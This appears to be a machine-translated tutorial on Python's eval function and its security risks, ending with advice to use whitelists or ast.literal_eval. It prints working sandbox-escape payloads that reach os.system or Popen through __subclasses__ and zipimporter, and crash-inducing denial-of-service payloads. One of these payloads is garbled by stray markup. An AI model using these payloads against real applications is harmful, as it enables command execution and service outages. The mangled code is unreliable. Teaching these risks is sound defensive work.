Detailed explanation of the usage of eval in python and introduction to potential risks

This article brings you a detailed explanation of the usage of eval in python and an introduction to potential risks. It has certain reference value. Friends in need can refer to it. I hope it will be helpful to you.

Preface to eval

In [1]: eval("2+3")
Out[1]: 5

In [2]: eval('[x for x in range(9)]')
Out[2]: [0, 1, 2, 3, 4, 5, 6, 7, 8]

When the built-in module in the memory contains os, eval can also execute commands:

In [3]: import os

In [4]: eval("os.system('whoami')")
hy-201707271917\administrator
Out[4]: 0

Of course, eval can only execute Python expressions Type code cannot be directly used for import operations, but exec can. If you must use eval for import, use __import__:

In [8]: eval("__import__('os').system('whoami')")
hy-201707271917\administrator
Out[8]: 0

In actual code, there is often a need to use client data to be brought into eval for execution. For example, the introduction of dynamic modules, for example, there may be multiple crawlers on an online crawler platform and they are located in different modules. The server side often only needs to call the crawler type selected by the user on the client side, and use exec or eval on the backend. It is very convenient to make dynamic calls and implement back-end coding. However, if the user's request is not handled properly, it will cause serious security vulnerabilities.

Safe" use of eval

The most advocated now is to use the last two parameters of eval to set the whitelist of the function:

The declaration of the Eval function is eval(expression[ , globals[, locals]])

Among them, the second and third parameters respectively specify functions that can be used in eval, etc. If not specified, the default is the module included in the globals() and locals() functions. and functions.

>>> import os
>>> 'os' in globals()
True
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0
>>> eval('os.system('whoami')',{},{})
Traceback (most recent call last):
  File "", line 1, in 
  File "", line 1, in 
NameError: name 'os' is not defined

If you specify that only abs functions are allowed to be called, you can use the following writing method:

>>> eval('abs(-20)',{'abs':abs},{'abs':abs})
20
>>> eval('os.system('whoami')',{'abs':abs},{'abs':abs})
Traceback (most recent call last):
  File "", line 1, in 
  File "", line 1, in 
NameError: name 'os' is not defined
>>> eval('os.system('whoami')')
win-20140812chjadministrator
0

Using this method for protection can indeed play a certain role, but this The processing method may be bypassed, causing other problems!

Bypass execution code 1

The bypassed scenario is as follows. Xiao Ming knows that eval will bring certain security risks, so Use the following means to prevent eval from executing arbitrary code:

env = {}
env["locals"]   = None
env["globals"]  = None
env["__name__"] = None
env["__file__"] = None
env["__builtins__"] = None
 
eval(users_str, env)

__builtins__ in Python is a built-in module, which is used to set built-in functions. For example, the familiar abs, open and other built-in functions are all in this The module is stored in a dictionary. The following two ways of writing are equivalent:

>>> __builtins__.abs(-20)
20
>>> abs(-20)
20

We can also customize built-in functions and use them like built-in functions in Python:

>>> def hello():
...     print 'shabi'
>>> __builtin__.__dict__['say_hello'] = hello
>>> say_hello()
shabi

Xiao Ming sets the built-in module in the scope of the eval function to None, which seems very thorough, but it can still be bypassed. __builtins__ is a reference to __builtin__, and under the __main__ module, both are equivalent:

>>> id(__builtins__)
3549136
>>> id(__builtin__)
3549136

According to the method mentioned by Wuyun drops, you can use the following code:

[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == "zipimporter"][0]("/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module("configobj").os.system("uname")

The above code first uses __class__ and __subclasses__ to dynamically load the object object , this is because object cannot be used directly in eval. Then use the zipimporter of the subclass of object to import the configobj module in the egg compressed file, and call the os module in its built-in module to implement command execution. Of course, the premise is that there is The egg file of configobj. The configobj module is very interesting. It actually has a built-in os module:

>>> "os" in configobj.__dict__
True
>>> import urllib
>>> "os" in urllib.__dict__
True
>>> import urllib2
>>> "os" in urllib2.__dict__
True
>>> configobj.os.system("whoami")
win-20140812chjadministrator
0

Modules similar to configobj such as urllib, urllib2, setuptools, etc. all have built-in os. In theory, any one can be used. If it is not possible To download the egg compressed file, you can download the folder with setup.py, add:

from setuptools import setup, find_packages

and then execute:

python setup.py bdist_egg

to find the corresponding egg file in the dist folder. The bypass demo is as follows:

>>> env = {}
>>> env["locals"]   = None
>>> env["globals"]  = None
>>> env["__name__"] = None
>>> env["__file__"] = None
>>> env["__builtins__"] = None
>>> users_str = "[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'zipimporter'][0]('E:/internships/configobj-5.0.5-py2.7.egg').load_module('configobj').os.system('whoami')"
>>> eval(users_str, env)
win-20140812chjadministrator
0
>>> eval(users_str, {}, {})
win-20140812chjadministrator
0

Denial of Service Attack 1

There are many interesting things in the subclasses of object. Execute the following code to view:

[x.__name__ for x in ().__class__.__bases__[0].__subclasses__()]

I won’t output the results here. If you execute it, you can see many interesting modules, such as file, zipimporter, Quitter, etc. After testing, the constructor of file is isolated by the interpreter sandbox. Simply, or directly exit the Quitter subclass exposed by the object:

>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__
 == 'Quitter'][0](0)()", {'__builtins__':None})

C:/>
If you are lucky and encounter sensitive modules such as os imported into the other party's program, then Popen will It can be used and bypasses the restriction that __builins__ is empty. The example is as follows:

>>> import subprocess
>>> eval("[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == 'Popen'][0](['ping','-n','1','127.0.0.1'])",{'__builtins__':None})
 
>>>
正在 Ping 127.0.0.1 具有 32 字节的数据:
来自 127.0.0.1 的回复: 字节=32 时间>>

In fact, there are many such situations, such as importing the os module, which is generally used to deal with path problems. Therefore, when encountering this situation, you can list a large number of functional functions to detect whether there are some dangerous functions in the subclass of the target object that can be used directly.

Denial of service attack 2

Similarly, we can even bypass __builtins__ as None, causing a denial of service attack. The payload (from foreigner blog) is as follows:

>>> eval('(lambda fc=(lambda n: [c 1="c" 2="in" 3="().__class__.__bases__[0" language="for"][/c].__subclasses__() if c.__name__ == n][0]):fc("function")(fc("code")(0,0,0,0,"KABOOM",(),(),(),"","",0,""),{})())()', {"__builtins__":None})

When running the above code, Python crashes directly, causing a denial of service attack. The principle is to construct a piece of code, that is, a code object, through nested lambdas. Allocate an empty stack for this code object and give the corresponding code string, here is KABOOM. If the code is executed on the empty stack, a crash will occur. After the construction is completed, it can be triggered by calling the fc function. The idea is not unsexy.

Summary

We can see from the above that simply setting the built-in module to empty is not enough. The best mechanism is to construct a whitelist. If If you find it troublesome, you can use ast.literal_eval instead of unsafe eval.

This article has ended here. For more other exciting content, you can pay attention to the python video tutorial column of the PHP Chinese website!

The above is the detailed content of Detailed explanation of the usage of eval in python and introduction to potential risks. For more information, please follow other related articles on the PHP Chinese website!